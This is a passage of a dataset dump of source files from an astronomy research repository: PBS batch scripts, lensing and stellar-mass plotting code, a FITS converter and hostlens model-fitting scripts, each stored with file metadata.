outfile.write(output)\n outfile.close()\n\n print(\"Total time for subfield: --- %s seconds ---\" % (time.time() - start_timesubfield))\n\nprint(\"Total time for field: --- %s seconds ---\" % (time.time() - start_timefield))\n\nprint 'Done!'\n\n" }, { "alpha_fraction": 0.6451612710952759, "alphanum_fraction": 0.6733871102333069, "avg_line_length": 13.588234901428223, "blob_id": "cb5b3062fbadda9b8283bea29f364c799723554c", "content_id": "617540c9bb3d16e706cbe7b2f3561ef428c0d0ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 248, "license_type": "no_license", "max_line_length": 36, "num_lines": 17, "path": "/python/scripts/NAOJ/batchtest.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Logb0.out\n#PBS -e Logb0.err\n#PBS -N 0\n#PBS -l mem=4gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/kappaplanes/\n\npython readtest.py\n" }, { "alpha_fraction": 0.5997056365013123, "alphanum_fraction": 0.6298748850822449, "avg_line_length": 33.846153259277344, "blob_id": "f438d888936898f1adab26b42fbc47523fe9ae9e", "content_id": "75ad7ad5330c5120c529da25d63c5d78459fce0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1359, "license_type": "no_license", "max_line_length": 108, "num_lines": 39, "path": "/python/catalogue_utilities/ascii_to_fitsHE0435.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu, July 22 2018\n# Reads an ascii file with multiple columns and converts it into a FITS file with same data types and header\n\nimport sys\nimport numpy as np\nimport fitsio # https://github.com/esheldon/fitsio\nimport astropy.table as table\nimport glob\nimport time\nimport collections\n\nroot = '/lfs08/rusucs/HE0435/'\nlist = glob.glob(root+'nobetaave3435NEWMEASUREDmedinject_ugriz_HE0435_GGL_los_8_*_45.cat')\nstart_time = time.time()\n#for i in range(1):\nfor i in range(len(list)):\n print list[i]\n headfile = open(list[i], 'r')\n head1 = headfile.readline()\n head2 = headfile.readline()\n head = False\n if head1.split()[0] == '#' and len(head1.split()[1:]) == len(head2.split()): # if there is a header\n head1 = head1.split()[1:] # ignore the # character\n head = True\n dict = collections.OrderedDict()\n for j in range(len(head2.split())):\n data = np.loadtxt(list[i],usecols=[j],unpack=True)\n if data.dtype == np.float64: type = 'float32'\n else: type = data.dtype\n if head == True:\n dict[head1[j]] = np.array(data, dtype=type)\n else:\n dict['col%s' %j] = np.array(data, dtype=type)\n del data\n t = table.Table(dict)\n del dict\n t.write('%s.fits' %list[i][:-4], overwrite = True)\n del t\nprint(\" Total time --- %s seconds ---\" % (time.time() - start_time))\n" }, { "alpha_fraction": 0.6634799242019653, "alphanum_fraction": 0.7648183703422546, "avg_line_length": 25.149999618530273, "blob_id": "9138b99c3de97f2e1885d0289dde8ad6f7e3d456", "content_id": "7da01ff8ac46ca41b115b45ff74dd2befb3e95f8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 523, "license_type": "no_license", "max_line_length": 71, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim21.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log21s.out\n#PBS -e Log21s.err\n#PBS -N 21s\n#PBS -l 
mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal oneoverr mass\npython inferkappasimbias.py WFI2033 5 120 23 meds gal oneoverr mass\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal oneoverr mass\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal oneoverr mass\n" }, { "alpha_fraction": 0.5144606828689575, "alphanum_fraction": 0.6138142347335815, "avg_line_length": 45.921875, "blob_id": "4c0ab31261eead9002490546d7d91af17012a844", "content_id": "d42d3d9acc045e982eb550b5b0c19961ed658c43", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2939, "license_type": "no_license", "max_line_length": 200, "num_lines": 64, "path": "/python/plot_utilities/plot_ReinReff.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Simple code for scatter plot with y error bars.\n##########################\n\n#RXJ Rein=1.64 Reff=1.85 -> Rein/Reff=0.89 H0=78.2+/-3.4\n#J Rein=1.25 Reff=0.34 -> Rein/Reff=3.68 H0=68.9+/-5.2 (Simon confirmed it is circularized)\n#HE Rein=1.18 Reff=1.33 -> Rein/Reff=0.89 H0=71.7+/-4.6 (Ken confirmed circularized)\n#B Rein=0.85 (main galaxy) Reff=0.58 -> Rein/Reff=1.47 H0=71.0+/-3.1 (F814W. since the lens is spiral, filter is important)\n#WFI Rein=0.93 Reff=1.31, 1.44 -> Rein/Reff=0.71-0.65 H0=71.6+/-4.4\n#PG Rein=1.08 Reff=0.64 H0=81.1+/-7.5 (Chih-Fan)\n\nimport pylab as plt\nimport numpy as np\n\nfig = plt.figure(figsize=(5,5))\nax1 = fig.add_subplot(1,1,1)\n#ax1.set(aspect=1)\nax1.set_aspect(1, adjustable='datalim')\n\nax = plt.subplot(1,1,1, sharex=ax1, sharey=ax1)\nBh = 71.0; Bhsup = 2.9; Bhinf = 3.3; Bein = 0.85; Beff = 0.58\nRh = 78.2; Rhsup = 3.4; Rhinf = 3.4; Rein = 1.64; Reff = 1.85\nHh = 71.7; Hhsup = 4.8; Hhinf = 4.5; Hein = 1.18; Heff = 1.33\nJh = 68.9; Jhsup = 5.4; Jhinf = 5.1; Jein = 1.25; Jeff = 0.34\nWh = 71.6; Whsup = 3.8; Whinf = 4.9; Wein = 0.93; Weff = 1.31\nPh = 81.1; Phsup = 8.0; Phinf = 7.1; Pein = 1.08; Peff = 0.64\nx = np.array([Bein/Beff, Rein/Reff, Hein/Heff, Jein/Jeff, Wein/Weff, Pein/Peff])\ny = np.array([Bh, Rh, Hh, Jh, Wh, Ph])\nysup = np.array([Bhsup, Rhsup, Hhsup, Jhsup, Whsup, Phsup])\nyinf = np.array([Bhinf, Rhinf, Hhinf, Jhinf, Whinf, Phinf])\n\n#x, y, yinf, ysup = np.loadtxt(\"/Users/eduardrusu/software/bpz-1.99.3/test/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_forbpzspecz_specflag0_bpz.cat\", usecols=(9, 1, 2, 3), unpack=True)\n#x, y, yinf, ysup = np.loadtxt(\"bpzspeczeazy.cat\", usecols=(3, 0, 1, 2), unpack=True)\n#x = x[abs(y) <= zlim]\n#y = y[abs(y) <= zlim]\n#yinf = yinf[abs(y) <= zlim]\n#ysup = ysup[abs(y) <= zlim]\n#y = y[abs(x) <= zlim]\n#x = x[abs(x) <= zlim]\n#yinf = yinf[abs(x) <= zlim]\n#ysup = ysup[abs(x) <= zlim]\nax.tick_params(labelsize=14)\n#plt.scatter(x,y, color='k')\nplt.errorbar(x[0], y[0], yerr=[[yinf[0]], [ysup[0]]], fmt='o', label='B1608')\nplt.errorbar(x[1], y[1], yerr=[[yinf[1]], [ysup[1]]], fmt='o', label='RXJ1131')\nplt.errorbar(x[2], y[2], yerr=[[yinf[2]], [ysup[2]]], fmt='o', label='HE0435')\nplt.errorbar(x[3], y[3], yerr=[[yinf[3]], [ysup[3]]], fmt='o', label='J1206')\nplt.errorbar(x[4], y[4], yerr=[[yinf[4]], [ysup[4]]], fmt='o', label='WFI2033')\nplt.errorbar(x[5], y[5], yerr=[[yinf[5]], [ysup[5]]], fmt='o', label='PG1115')\n#ax.plot(x, m*x + b, 
'--')\nplt.xlabel('Rein/Reff')\n#plt.ylabel('phot-z')\nplt.ylabel('H_0')\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\n#plt.tick_params(labelbottom='off')\n#plt.title('HE0435 ugri specz-photz')\nplt.legend()\nplt.subplots_adjust(bottom=0.1, left =0.2, right=0.9, top=0.90, wspace=0, hspace=0)\n#plt.tight_layout()\n#fig.text(0.05, 0.5, 'photo-z', ha='center', va='center', size='20', rotation='vertical')\n#plt.title('HE0435 ugri specz-photz')\nplt.savefig('H0-Rein_over_Reff.png')\n" }, { "alpha_fraction": 0.6159624457359314, "alphanum_fraction": 0.6647887229919434, "avg_line_length": 29.428571701049805, "blob_id": "e0bf1b5253e656ec1c5ce3be024f3b88fd597a37", "content_id": "a8154681b03daf915890a4c9384b4a87945babd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1065, "license_type": "no_license", "max_line_length": 151, "num_lines": 35, "path": "/python/plot_utilities/densityplotkappagamma.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# produces density plot for the MS catalogue Mhalo vs catalogue Mstar\n\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\n\nfont = 10\nticksize = 10\n\nplt.clf()\nfig = plt.figure(figsize=(10,12))\n#fig, axes = plt.subplots(nrows=2, ncols=2)\n\nax1 = fig.add_subplot(1,1,1)\nax1.set_aspect(1)\nx, y = np.loadtxt(\"/Users/perseus/Desktop/GGL_los_8_0_0_0_0_N_4096_ang_4_Bower_galaxies_on_plane_27_to_63.imagesplot.txt\", usecols=(0, 2), unpack=True)\nzlim = 14.5\nzlim_ = 10\n#x = np.log10(x)\n#y = np.log10(y)\nx = x[(abs(y) <= zlim) & (abs(y) > zlim_)]\ny = y[(abs(y) <= zlim) & (abs(y) > zlim_)]\ny = y[(abs(x) <= zlim) & (abs(x) > zlim_)]\nx = x[(abs(x) <= zlim) & (abs(x) > zlim_)]\nhist2d(x, y, bins=[100, 100], norm=LogNorm())\nplt.xticks(rotation='vertical',size = ticksize)\nplt.yticks(size = ticksize)\ncolorbar()\ndelta = (y-x)/(1+x)\nplt.xlabel('Mhalo', fontsize=font)\nplt.ylabel('Mhalo (Behroozi)', fontsize=font)\nplt.xlim(zlim_, zlim)\nplt.ylim(zlim_, zlim)\nplt.savefig('/Users/perseus/Desktop/Bower.png' , dpi=250)\n" }, { "alpha_fraction": 0.6352829337120056, "alphanum_fraction": 0.7874464988708496, "avg_line_length": 62.727272033691406, "blob_id": "3c7ba93bd5cdba11c0a28bf98828d43e9b9255c8", "content_id": "a63a0fedf69c0ee0a0514ec87be2efcead312cbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2103, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/python/scripts/NAOJ/batch3_insertstars.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q4\n#PBS -o Logb3.out\n#PBS -e Logb3.err\n#PBS -N 3\n#PBS -l mem=15gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /lfs08/rusucs/code/\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_0_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_1_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_2_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_3_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_4_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython 
kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_5_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_6_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_7_N_4096_ang_4_rays_to_plane_34_f 23 45 measured 5\n\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_0_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_1_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_2_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_3_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_4_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_5_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_6_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\npython kappamed_insertstarsnobetasingleband.py PG1115 GGL_los_8_3_7_N_4096_ang_4_rays_to_plane_34_f 23 120 measured 5\n" }, { "alpha_fraction": 0.589480459690094, "alphanum_fraction": 0.6481719017028809, "avg_line_length": 39.493507385253906, "blob_id": "6bee90e07e76fb6c58034330ab7cb28b983e58cb", "content_id": "08ee47cf8bbcc68246d1329bb7321710a6d2223a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3118, "license_type": "no_license", "max_line_length": 216, "num_lines": 77, "path": "/python/plot_utilities/plot_stellarmasserrbar.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "##########################\n# Simple code for scatter plot with xy error bars. Computes bias, scatter and fraction of outliers. 
Ignores the outliers when computing bias and scatter\n##########################\n\n\nfrom matplotlib.colors import LogNorm\nimport scipy.optimize as optimization\nfrom pylab import *\nimport numpy as np\nax=plt.subplot(111)\n#zlim = 1.0\noutlim = 0.15\n\nfig = plt.figure(figsize=(5,5))\nax1 = fig.add_subplot(1,1,1)\n#ax1.set(aspect=1)\nax1.set_aspect(1, adjustable='datalim')\n\nax = plt.subplot(1,1,1, sharex=ax1, sharey=ax1)\n#x_, y_, xinf_, xsup_, yinf_, ysup_ = np.loadtxt(\"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassified.cat\", usecols=(62, 81, 61, 63, 80, 82), unpack=True)\nx_, y_, xinf_, xsup_, yinf_, ysup_ = np.loadtxt(\"rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslepharetphot.cat\", usecols=(62, 81, 61, 63, 80, 82), unpack=True)\nx = x_[(x_ > 0) & (y_ > 0)]\ny = y_[(x_ > 0) & (y_ > 0)]\nxinf = xinf_[(x_ > 0) & (y_ > 0)]\nyinf = yinf_[(x_ > 0) & (y_ > 0)]\nxsup = xsup_[(x_ > 0) & (y_ > 0)]\nysup = ysup_[(x_ > 0) & (y_ > 0)]\nax.tick_params(labelsize=14)\n#plt.scatter(x,y, color='k')\nplt.errorbar(x, y, xerr=[x-xinf, xsup-x], yerr=[y-yinf, ysup-y], fmt='o')\ndelta = (y-x)/(1+x)\n#delta = (y-(m+x))/(1+x)\nfirstpass_std = np.std(delta)\n#std = np.std(delta[abs(delta)<(4*firstpass_std)])\nstd = np.std(delta[abs(delta)<outlim])\nstdoutobj = \"%d objects\" % len(x)\nstdout = \"scatter = %.3f\" % std\n#out = 100.0*len(delta[abs(delta)>(4 * std)])/len(delta)\noutnr = len(delta[abs(delta)>outlim])\nout = 100.0*len(delta[abs(delta)>outlim])/len(delta)\noutlier = \"outliers = %d (%.2f %%)\" % (outnr,out)\n#bestfit = \"best-fit line = %.2f * x + %.2f\" % (m,b)\n#m, b = np.polyfit(x, y, 1)\nx = x[np.where(abs(delta)<outlim)]\ny = y[np.where(abs(delta)<outlim)]\ndef func(x, m):\n return m+x\nfit=optimization.curve_fit(func, x, y, np.array([0])) # the array contains the initial guesses\nm=fit[0][0]\nbias = \"bias = %.3f\" % m\nx = np.linspace(0, 20, 1000)\n#ax.plot(x, m*x + b, '--')\nax.plot(x, m+x, 'b--')\nax.plot(x, x, 'g')\nplt.plot(x, 0.85*x-0.15, 'r--')\nplt.plot(x, 1.15*x+0.15, 'r--')\nax.text(0.05, 0.95, stdoutobj, fontsize=15, color='black',transform=ax.transAxes)\nax.text(0.05, 0.90, stdout, fontsize=15, color='black',transform=ax.transAxes)\nax.text(0.05, 0.85, outlier, fontsize=15, color='black',transform=ax.transAxes)\nax.text(0.05, 0.80, bias, fontsize=15, color='black',transform=ax.transAxes)\n#ax.text(0.05, 0.80, bestfit, fontsize=15, color='black',transform=ax.transAxes)\nplt.xlabel('spec-z')\nplt.ylabel('phot-z')\n#plt.xlim(0, 3.5)\n#plt.ylim(0, 3.5)\nplt.xlabel('stellar mass')\nplt.ylabel('stellar mass w/ IRAC')\nplt.xlim(5, 12)\nplt.ylim(5, 12)\n#plt.tick_params(labelbottom='off')\n#plt.title('HE0435 ugri specz-photz')\n\nplt.subplots_adjust(bottom=0.1, left =0.2, right=0.9, top=0.90, wspace=0, hspace=0)\n#plt.tight_layout()\n#fig.text(0.05, 0.5, 'photo-z', ha='center', va='center', size='20', rotation='vertical')\n#plt.title('HE0435 ugri specz-photz')\nplt.savefig('stellarmass_errbartphot.png')\n" }, { "alpha_fraction": 0.6557239294052124, "alphanum_fraction": 0.7188552021980286, "avg_line_length": 41.42856979370117, "blob_id": "5da67546b8f2e295a7d8699264c314d73fd1bb7d", "content_id": "06b7eacc4a23577cc5155d6910133c669b07f44f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 86, "num_lines": 28, "path": "/python/plot_utilities/plot_symbolsonimage.py", 
"repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# used to plot Fig. 1 from Rusu et al. 2017\n\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.clf()\nstar = np.loadtxt(\"star.cat\",unpack=True)\nspecz = np.loadtxt(\"specz.cat\",unpack=True)\nphotz = np.loadtxt(\"photz.cat\",unpack=True)\nimage = fits.getdata(\"0435_scam_mar14_r_blk.fits\")\nimage[image<0]=0.0001\nmask = fits.getdata(\"mskHE0435_asecrad120_no5arcsec_blk.fits\")\nmask[mask!=0]=1\nplt.scatter(star[0]/2,star[1]/2,marker='*',facecolors='none', edgecolors='k')\nplt.scatter(photz[0]/2,photz[1]/2,marker='o',facecolors='none', edgecolors='k')\nplt.scatter(specz[0]/2,specz[1]/2,marker='s',facecolors='none', edgecolors='k')\nplt.imshow(image, cmap='gray_r', norm=LogNorm(), origin='lower', vmin=0.001, vmax=100)\nplt.imshow(mask, cmap='Oranges', origin='lower', alpha=0.2)\ncircle1 = plt.Circle((300,300),225/2.0,color='k',fill=False)\ncircle2 = plt.Circle((300,300),300,color='k',fill=False)\nfig = plt.gcf()\nfig.gca().add_artist(circle1)\nfig.gca().add_artist(circle2)\nfig = plt.gca()\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig('FOV_small.png', dpi=300, bbox_inches='tight')\n" }, { "alpha_fraction": 0.5542213916778564, "alphanum_fraction": 0.5812382698059082, "avg_line_length": 43.94827651977539, "blob_id": "62c26c4d8d7b7f241bc314f5a8c881dcca4b46b2", "content_id": "9f6528d24f6e0dcc82d1c2ba3588150966a5ece3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2665, "license_type": "no_license", "max_line_length": 266, "num_lines": 58, "path": "/python/modeling_utilities/simulateandfit.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Given an image containing flux from a best-fit model and its generating hostlens configuration file, simulate similar images with noise, then fit them by starting from the correct input parameter values as initial guesses, and compute the scatter from these values\r\n\r\nimport numpy as np\r\nfrom astropy.io import fits\r\nimport os\r\n\r\nmodel = \"fixsersstars_sdfbFCSA00205330cutcutfliprotate_model.fits\"\r\nsky = 2250 # value efore sky subtraction\r\nskyrms = 25 # measured on empty sky regions of the original image with imexam\r\n\r\nimage = fits.open(model)\r\ndata = image[0].data + sky\r\nsims = 10\r\nout = np.zeros((sims,np.shape(data)[0],np.shape(data)[1]))\r\n\r\nfor i in range(sims):\r\n out[i] = np.random.poisson(abs(data)) - sky + np.random.normal(0,25,size=(np.shape(data)[0],np.shape(data)[1]))\r\n image[0].data = out[i].astype(\"float32\")\r\n image.writeto(model[:-5]+\"_noise%s.fits\" % str(i),clobber=True)\r\n\r\nfor i in range(sims):\r\n os.system(\"cp %s %s\" % (model[:-11] + \"_file.input\",model[:-11] + str(i) + \"_file.input\"))\r\n with open(model[:-11] + str(i) + \"_file.input\", 'r') as f:\r\n hostlens = f.readlines()\r\n hostlens[1 - 1] = \"obsfits %s\" % (model[:-5]+\"_noise%s.fits\" %str(i)) + \"\\n\"\r\n hostlens[5 - 1] = \"prefix %s\" % (model[:-11] + str(i)) + \"\\n\"\r\n hostlens[22 - 1] = \"dump_model 0\" + \"\\n\"\r\n with open(model[:-11] + str(i) + \"_file.input\", 'w') as f:\r\n f.writelines(hostlens)\r\n f.close()\r\n if i == 0: # identify the variables\r\n var = []\r\n with open(model[:-11] + str(i) + \"_file.input\", 'r') as g:\r\n hostlens = g.readline()\r\n while hostlens:\r\n hostlens = g.readline()\r\n if (len(hostlens.split()) >= 3) and 
(hostlens.split()[0].isdigit() == True) and (hostlens.split()[2] == '1'):\r\n var.append(float(hostlens.split()[1]))\r\n\r\nexecute = \"\"\r\nfor i in range(sims):\r\n if i < sims - 1: execute += \"hostlens %s & \" % (model[:-11] + str(i) + \"_file.input\")\r\n else: execute += \"hostlens %s \" % (model[:-11] + str(i) + \"_file.input\")\r\nos.system(execute)\r\n\r\nfitted = np.zeros((sims,len(var)))\r\nfor i in range(sims):\r\n fit = []\r\n with open(model[:-11] + str(i) + \"_file.input\", 'r') as g:\r\n hostlens = g.readline()\r\n while hostlens:\r\n hostlens = g.readline()\r\n if (len(hostlens.split()) >= 3) and (hostlens.split()[0].isdigit() == True) and (hostlens.split()[2] == '1'):\r\n fit.append(float(hostlens.split()[1]))\r\n fitted[i] = fit\r\n\r\nprint \"Standard deviations from given values:\"\r\nprint np.sqrt(np.std(fitted,axis=0,ddof=1)**2 + (var-np.mean(fitted,axis=0))**2)\r\n" }, { "alpha_fraction": 0.491203635931015, "alphanum_fraction": 0.5523427724838257, "avg_line_length": 79.9000015258789, "blob_id": "a3e29dc37f192f893d8f1f1b6986f9d2c0131660", "content_id": "8b7189d82ed1bfca36b7d90966a5a237506669e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5741, "license_type": "no_license", "max_line_length": 231, "num_lines": 70, "path": "/python/modeling_utilities/vary.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Randomly varies the input parameters for Hostlens, then delects all outputs except for the one with minimum chi^2\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\n\r\nfile = \"ylens_out_file.input\"\r\nprefix_out = \"ylens_out\"\r\nvary = 100\r\n\r\ndef string(hostlens):\r\n return \" \" + hostlens.split()[2] + \" \" + hostlens.split()[3] + \" \" + hostlens.split()[4] + \" \" + hostlens.split()[5] + \"\\n\"\r\ndef stringunit(hostlens): # for lines that end with e.g. 
\"[arcsec]\"\r\n return \" \" + hostlens.split()[2] + \" \" + hostlens.split()[3] + \" \" + hostlens.split()[4] + \" \" + hostlens.split()[5] + \" \" + hostlens.split()[6] + \"\\n\"\r\n\r\nfor i in range(vary):\r\n with open(file, 'r') as f:\r\n hostlens = f.readlines()\r\n hostlens[5 - 1] = \"prefix %s%s\" % (prefix_out,str(i + 1)) + \"\\n\"\r\n# psf + sky\r\n line = 30; x = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(0.8,0.2))) + stringunit(hostlens[line - 1]); hostlens[line - 1] = x # FWHM1\r\n line = 31; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(0.1,0.05))) + string(hostlens[line - 1]) # e1\r\n line = 32; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (np.random.uniform(0,360)) + stringunit(hostlens[line - 1]) # PA1\r\n line = 33; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(7,2))) + string(hostlens[line - 1]) # beta1\r\n line = 34; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(1.2,0.3))) + stringunit(hostlens[line - 1]) # FWHM2\r\n line = 35; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(0.1,0.05))) + string(hostlens[line - 1]) # e2\r\n line = 36; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (np.random.uniform(0,360)) + stringunit(hostlens[line - 1]) # PA2\r\n line = 37; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(2,1))) + string(hostlens[line - 1]) # beta2\r\n line = 38; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (np.random.uniform(0.001,0.999)) + \" \" + hostlens[line - 1].split()[2] + \" \" + hostlens[line - 1].split()[3] + \" # flux1 / (flux1 + flux 2) \\n\"\r\n line = 39; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (np.random.normal(0,10)) + stringunit(hostlens[line - 1]) # sky\r\n# point source\r\n line = 43; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(78.8,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 44; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(41.0,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 50; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(5.0e+06,1.0e+06))) + stringunit(hostlens[line - 1]) # flux_point\r\n line = 54; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(83.4,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 55; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(43.6,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 61; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(6.0e+06,1.0e+06))) + stringunit(hostlens[line - 1]) # flux_point\r\n line = 65; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(83.4,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 66; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(43.6,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 72; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(3.0e+06,1.0e+06))) + stringunit(hostlens[line - 1]) # flux_point\r\n line = 76; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + 
\"%.6e\" % (abs(np.random.normal(85.0,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 77; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(30.7,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 83; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(6.0e+05,3.0e+05))) + stringunit(hostlens[line - 1]) # flux_point\r\n# galaxy\r\n line = 87; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(84.5,1))) + stringunit(hostlens[line - 1]) # x\r\n line = 88; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(34.5,1))) + stringunit(hostlens[line - 1]) # y\r\n line = 89; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(1.0e+05,1.0e+05))) + stringunit(hostlens[line - 1]) # flux_galaxy\r\n #line = 92; hostlens[line - 1] = hostlens[line - 1].split()[0] + \" \" + \"%.6e\" % (abs(np.random.normal(0.5,0.2))) + stringunit(hostlens[line - 1]) # re\r\n\r\n with open(file, 'w') as f:\r\n f.writelines(hostlens)\r\n f.close()\r\n\r\n os.system(\"hostlens %s\" % file)\r\n\r\nchi = np.zeros(vary)\r\n\r\nfor i in range(vary):\r\n with open(prefix_out + str(i + 1) + \"_optresult.dat\", 'r') as f:\r\n hostlens = f.readlines()\r\n j = np.shape(hostlens)[0]\r\n while \"chi^2/nu\" not in hostlens[j - 1]: j -= 1\r\n chi[i] = float(hostlens[j - 1].split()[4])\r\n\r\nsave = np.where(chi == np.min(chi))[0][0] + 1\r\nfor i in range(vary):\r\n if i + 1 != save:\r\n os.system(\"rm %s%s_file.input\" % (prefix_out,str(i + 1)))\r\n os.system(\"rm 